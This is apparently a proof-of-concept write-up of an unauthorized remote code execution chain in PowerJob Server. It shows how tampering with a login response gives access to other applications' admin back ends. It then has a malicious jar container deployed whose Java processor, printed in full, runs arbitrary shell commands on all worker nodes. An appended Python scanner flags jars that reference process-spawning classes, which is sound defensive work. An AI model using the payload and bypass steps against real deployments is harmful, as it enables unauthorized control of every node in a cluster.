PowerJob Server Unauthorized Remote Code Execution
PowerJob Remote Code Execution
First, open the homepage and click the App Registration button:
Then log in with the application and password just registered, intercept the traffic, and modify the data field in the response packet. I can now log in to the admin back end of other applications beyond my authority:
We can click Container DevOps - Template generator, fill in the information and get a zip package.
Then we add our own malicious code to the package, like this:
Packaging the jar with the Maven package command gives me a malicious jar file:
payload
Source Code:
@Component
public class SimpleProcessor implements BasicProcessor {
    @Override
    public ProcessResult process(TaskContext taskContext) {
        OmsLogger omsLogger = taskContext.getOmsLogger();
        omsLogger.info("SimpleProcessor start to process, current JobParams is {}.", taskContext.getJobParams());
        // Instance parameters supplied when the job is run are used as the command
        String command = taskContext.getInstanceParams();
        ProcessBuilder builder = new ProcessBuilder();
        Process process = null;
        try {
            // Run the command through the platform shell, merging stderr into stdout
            if (SystemUtils.IS_OS_WINDOWS) {
                process = builder.command("cmd.exe", "/c", command).redirectErrorStream(true).start();
            } else {
                process = builder.command("sh", "-c", command).redirectErrorStream(true).start();
            }
            // Write each line of command output to the job log
            InputStream inputStream = process.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
            String line;
            while ((line = reader.readLine()) != null) {
                omsLogger.info(line);
            }
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        return new ProcessResult(true, "simple processor finished with params=" + command);
    }
}
Click Container Management, New container, FastJar, and upload the malicious jar file:
Click the save button. Now we can see the container:
Now click the deploy button to inject malicious code into all nodes:
Then go to the task management page, click the New job button, and fill in the information like this:
container’s ID#org.example.demo.SimpleProcessor
Schedule info: API
Click More in the task list, then the parameters run option:
Enter the command to execute; it will be executed on all machine nodes:
After a few seconds, all nodes will have executed the command you just entered:
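On the defending side, a container jar can be inspected before it is saved and deployed. The added example below (not part of the original write-up and not PowerJob code) parses the constant pool of every class in a jar and reports the classes that reference java/lang/ProcessBuilder or java/lang/Runtime, as the SimpleProcessor above does. The SUSPECT list, the function names and the sample jar are assumptions constructed for the example.

```python
import io
import struct
import zipfile

# Classes that start OS processes; a hit means "review by hand" (assumed list).
SUSPECT = {"java/lang/ProcessBuilder", "java/lang/Runtime"}
# Payload size of each fixed-length constant-pool tag (JVM spec, section 4.4).
SIZES = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
         12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

def referenced_classes(data):
    """Return the class names referenced by a .class file's constant pool."""
    magic, _minor, _major, count = struct.unpack_from(">IHHH", data, 0)
    if magic != 0xCAFEBABE:
        raise ValueError("not a class file")
    utf8, class_refs, pos, i = {}, [], 10, 1
    while i < count:
        tag = data[pos]
        if tag == 1:                       # Utf8: u2 length, then the bytes
            (n,) = struct.unpack_from(">H", data, pos + 1)
            utf8[i] = data[pos + 3:pos + 3 + n].decode("utf-8", "replace")
        elif tag == 7:                     # Class: u2 index of its Utf8 name
            class_refs.append(struct.unpack_from(">H", data, pos + 1)[0])
        pos += 1 + (2 + n if tag == 1 else SIZES[tag])
        i += 2 if tag in (5, 6) else 1     # long/double take two pool slots
    return {utf8[k] for k in class_refs if k in utf8}

def scan_jar(jar_file):
    """Map each .class entry of a jar (path or file object) to its suspect references."""
    hits = {}
    with zipfile.ZipFile(jar_file) as jar:
        for name in (n for n in jar.namelist() if n.endswith(".class")):
            found = referenced_classes(jar.read(name)) & SUSPECT
            if found:
                hits[name] = sorted(found)
    return hits

def sample_jar(classes):
    """Constructed input: a jar whose entries hold only a header and constant pool."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        for entry, names in classes.items():   # names must be ASCII
            pool = b"".join(b"\x01" + struct.pack(">H", len(n)) + n.encode()
                            + b"\x07" + struct.pack(">H", 2 * k + 1)
                            for k, n in enumerate(names))
            head = struct.pack(">IHHH", 0xCAFEBABE, 0, 52, 2 * len(names) + 1)
            jar.writestr(entry, head + pool)
    return buf
```

A hit calls for manual review of the jar before it is deployed to worker nodes; an empty result does not show that the jar is harmless.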